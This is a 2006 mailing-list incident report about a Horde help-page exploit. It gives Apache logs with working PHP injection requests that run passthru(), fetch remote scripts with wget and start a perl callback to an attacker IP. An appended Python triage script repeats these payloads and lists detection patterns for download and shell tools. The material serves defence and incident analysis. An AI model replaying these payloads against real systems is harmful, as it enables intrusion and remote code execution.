[dev] [SECURITY] Horde was used to hack my system
Roel Gloudemans
roel at gloudemans.info
Wed Apr 12 08:06:45 PDT 2006
I think there is a problem in /horde/services/help/index.php. This
script was used to dump some files in my temp dir and to start an IRC
server. The logs are below. I haven't looked at the code yet. I'm
scanning my system first.
Cheers,
Roel.
------------------ APRIL 09
----- Apache access LOG -------
82.107.175.186 - - [09/Apr/2006:13:45:56 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22id;df%20-h;quota%20-v;uname%20-a;pwd;ls%20-la;w%22);'. HTTP/1.1" 200 8647 "-" "Nozilla/P.N (Just for IDS woring)"
82.107.175.186 - - [09/Apr/2006:13:46:01 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22supfra.altervista.org%22.chr(47).%22tlsd.txt;ls%20-la%22);'. HTTP/1.1" 200 35733 "-" "Nozilla/P.N (Just for IDS woring)"
82.107.175.186 - - [09/Apr/2006:15:08:37 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22id;df%20-h;quota%20-v;uname%20-a;pwd;ls%20-lia;w%22);'. HTTP/1.1" 200 8664 "-" "Nozilla/P.N (Just for IDS woring)"
82.107.175.186 - - [09/Apr/2006:15:08:46 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22supfra.altervista.org%22.chr(47).%22tlsd.txt;ls%20-lia%22);'. HTTP/1.1" 200 39398 "-" "Nozilla/P.N (Just for IDS woring)"
82.107.175.186 - - [09/Apr/2006:15:14:21 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22id;df%20-h;quota%20-v;uname%20-a;pwd;ls%20-lia;w%22);'. HTTP/1.1" 200 8664 "-" "Nozilla/P.N (Just for IDS woring)"
82.107.175.186 - - [09/Apr/2006:15:14:30 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22supfra.altervista.org%22.chr(47).%22tlsd.txt;ls%20-lia%22);'. HTTP/1.1" 200 39468 "-" "Nozilla/P.N (Just for IDS woring)"
----- APACHE error log ---------
df: `/var/named/chroot/proc': Permission denied
--13:46:01-- http://supfra.altervista.org/tlsd.txt
=> `tlsd.txt'
Resolving supfra.altervista.org... 66.98.138.46
Connecting to supfra.altervista.org|66.98.138.46|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,307 (11K) [text/plain]
0K .......... . 100% 34.79 KB/s
13:46:02 (34.79 KB/s) - `tlsd.txt' saved [11307/11307]
df: `/var/named/chroot/proc': Toegang geweigerd
--15:08:46-- http://supfra.altervista.org/tlsd.txt
=> `tlsd.txt.1'
Herleiden van supfra.altervista.org... 66.98.138.46
Verbinding maken met supfra.altervista.org|66.98.138.46|:80... verbonden.
HTTP-verzoek is verzonden, wachten op antwoord... 200 OK
Lengte: 11,307 (11K) [text/plain]
0K .......... . 100% 43.77 KB/s
15:08:47 (43.77 KB/s) - 'tlsd.txt.1' opgeslagen [11307/11307]
df: `/var/named/chroot/proc': Toegang geweigerd
--15:14:30-- http://supfra.altervista.org/tlsd.txt
=> `tlsd.txt.2'
Herleiden van supfra.altervista.org... 66.98.138.46
Verbinding maken met supfra.altervista.org|66.98.138.46|:80... verbonden.
HTTP-verzoek is verzonden, wachten op antwoord... 200 OK
Lengte: 11,307 (11K) [text/plain]
0K .......... . 100% 78.07 KB/s
15:14:30 (78.07 KB/s) - 'tlsd.txt.2' opgeslagen [11307/11307]
------- APRIL 11
------------ Apache access log---------------
12.17.190.27 - - [11/Apr/2006:02:33:23 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22id%22);'. HTTP/1.1" 200 8013 "-" "Nozilla/P.N (Just for IDS woring)"
12.17.190.27 - - [11/Apr/2006:02:33:28 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22wget%22);'. HTTP/1.1" 200 8062 "-" "Nozilla/P.N (Just for IDS woring)"
193.109.122.56 - - [11/Apr/2006:02:35:22 +0200] "CONNECT 193.109.122.67:6668 HTTP/1.0" 200 941 "-" "pxyscand/2.1"
12.17.190.27 - - [11/Apr/2006:02:33:37 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22var%22.chr(47).%22tmp;wget%20www.squaq.go.ro%22.chr(47).%22cb;perl%20cb%2012.17.190.27%2065000%22);'. HTTP/1.1" 200 7964 "-" "Nozilla/P.N (Just for IDS woring)"
12.17.190.27 - - [11/Apr/2006:02:51:34 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22id%22);'. HTTP/1.1" 200 8021 "-" "Nozilla/P.N (Just for IDS woring)"
12.17.190.27 - - [11/Apr/2006:02:51:38 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22wget%22);'. HTTP/1.1" 200 8061 "-" "Nozilla/P.N (Just for IDS woring)"
12.17.190.27 - - [11/Apr/2006:02:51:41 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22var%22.chr(47).%22tmp;wget%20www.squaq.go.ro%22.chr(47).%22cb;perl%20cb%2012.17.190.27%2065000%22);'. HTTP/1.1" 200 7973 "-" "Nozilla/P.N (Just for IDS woring)"
12.17.190.27 - - [11/Apr/2006:02:51:48 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22var%22.chr(47).%22tmp;wget%20www.squaq.go.ro%22.chr(47).%22cb;perl%20cb%2012.17.190.27%2065000%22);'. HTTP/1.1" 200 7973 "-" "Nozilla/P.N (Just for IDS woring)"
------- Apache ERROR LOG ------------------
--02:33:38-- http://www.squaq.go.ro/cb
=> `cb'
Herleiden van www.squaq.go.ro... 81.196.20.134
Verbinding maken met www.squaq.go.ro|81.196.20.134|:80... verbonden.
HTTP-verzoek is verzonden, wachten op antwoord... 200 OK
Lengte: 356 [text/plain]
0K 100% 30.86 MB/s
02:33:38 (30.86 MB/s) - 'cb' opgeslagen [356/356]
--02:51:42-- http://www.squaq.go.ro/cb
=> `cb.1'
Resolving www.squaq.go.ro... 81.196.20.134
Connecting to www.squaq.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 356 [text/plain]
0K 100% 30.86 MB/s
02:51:42 (30.86 MB/s) - `cb.1' saved [356/356]
--02:51:48-- http://www.squaq.go.ro/cb
=> `cb.2'
Resolving www.squaq.go.ro... 81.196.20.134
Connecting to www.squaq.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 356 [text/plain]
0K 100% 28.29 MB/s
02:51:48 (28.29 MB/s) - `cb.2' saved [356/356]
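To turn logs like these into something a detection rule or a quick triage script can act on, here is an added example in Python. It is mine, not Roel's and not Horde code. It parses Apache combined-format lines, URL-decodes the query string, flags the PHP execution call and the ".chr(47)." string splicing seen in the requests above, notices the CONNECT proxy probe, and pulls the download hosts and the embedded IP out of the decoded payloads so they can be matched against the wget transcripts in the error log. The sample lines are taken from this post (re-joined where the mail wrapped them) plus one constructed benign request for contrast; the indicator names and the helper functions are my own.

```python
import re
from urllib.parse import unquote

# Apache combined log format:
#   host ident user [time] "method target protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# PHP functions that never belong in the query string of a legitimate request.
PHP_EXEC_CALLS = re.compile(r'\b(passthru|system|exec|shell_exec|popen|proc_open|eval)\s*\(', re.I)
# "...".chr(47)."..." splicing, used in these logs to build "/" without sending it literally.
CHR_SPLICE = re.compile(r'"\.chr\((\d+)\)\."')
# Downloaders and interpreters named in the decoded payload (wget and perl in the post).
FETCH_OR_INTERP = re.compile(r'\b(wget|curl|fetch|perl|python|nc)\b')
# Host part of a wget/curl/fetch argument, with or without a scheme.
FETCH_HOST = re.compile(r'\b(?:wget|curl|fetch)\s+(?:https?://)?([A-Za-z0-9.-]+)')
IPV4 = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

# Lines from the post, re-joined where the mail client wrapped them, plus one
# constructed benign request (10.0.0.5) that must not fire anything.
SAMPLE_LINES = [
    '82.107.175.186 - - [09/Apr/2006:13:45:56 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22id;df%20-h;quota%20-v;uname%20-a;pwd;ls%20-la;w%22);\'. HTTP/1.1" 200 8647 "-" "Nozilla/P.N (Just for IDS woring)"',
    '82.107.175.186 - - [09/Apr/2006:13:46:01 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22supfra.altervista.org%22.chr(47).%22tlsd.txt;ls%20-la%22);\'. HTTP/1.1" 200 35733 "-" "Nozilla/P.N (Just for IDS woring)"',
    '193.109.122.56 - - [11/Apr/2006:02:35:22 +0200] "CONNECT 193.109.122.67:6668 HTTP/1.0" 200 941 "-" "pxyscand/2.1"',
    '12.17.190.27 - - [11/Apr/2006:02:33:37 +0200] "GET //horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22var%22.chr(47).%22tmp;wget%20www.squaq.go.ro%22.chr(47).%22cb;perl%20cb%2012.17.190.27%2065000%22);\'. HTTP/1.1" 200 7964 "-" "Nozilla/P.N (Just for IDS woring)"',
    '10.0.0.5 - - [09/Apr/2006:13:40:00 +0200] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (constructed benign sample)"',
]


def parse_line(line):
    """Split one combined-format line into its fields; None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def decoded_query(rec):
    """URL-decode only the query string. The split is done on the raw target so an
    encoded '?' inside the path cannot hide the query from the decoder."""
    return unquote(rec["target"].partition("?")[2])


def deobfuscate(text):
    """Resolve ".chr(N)." splices to the character they produce."""
    def splice(m):
        n = int(m.group(1))
        return chr(n) if n < 256 else m.group(0)
    return CHR_SPLICE.sub(splice, text)


def analyse(line):
    """Return the indicator names that fire for one line (empty list = nothing suspicious)."""
    rec = parse_line(line)
    if rec is None:
        return ["unparseable"]
    if rec["method"] == "CONNECT":
        return ["proxy_probe"]  # someone testing whether the web server relays TCP
    query = decoded_query(rec)
    findings = []
    if PHP_EXEC_CALLS.search(query):
        findings.append("php_exec_call")
    if CHR_SPLICE.search(query):
        findings.append("chr_obfuscation")
    if FETCH_OR_INTERP.search(deobfuscate(query)):
        findings.append("fetch_or_interpreter")
    return findings


def extract_iocs(lines):
    """Collect source IPs of flagged requests, the hosts the payloads download from,
    and IPs embedded in the payloads (here the callback address given to the perl script)."""
    iocs = {"sources": set(), "download_hosts": set(), "payload_ips": set()}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not analyse(line):
            continue
        iocs["sources"].add(rec["host"])
        if rec["method"] == "CONNECT":
            continue
        payload = deobfuscate(decoded_query(rec))
        iocs["download_hosts"].update(FETCH_HOST.findall(payload))
        iocs["payload_ips"].update(IPV4.findall(payload))
    return iocs


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(analyse(line), line[:60])
    print(extract_iocs(SAMPLE_LINES))
```

A 200 status says nothing about whether the injected code actually ran; in this post the confirmation is the wget transcript in the error log, which is why the hosts pulled out of the payloads are worth correlating with it and with outbound DNS or proxy logs.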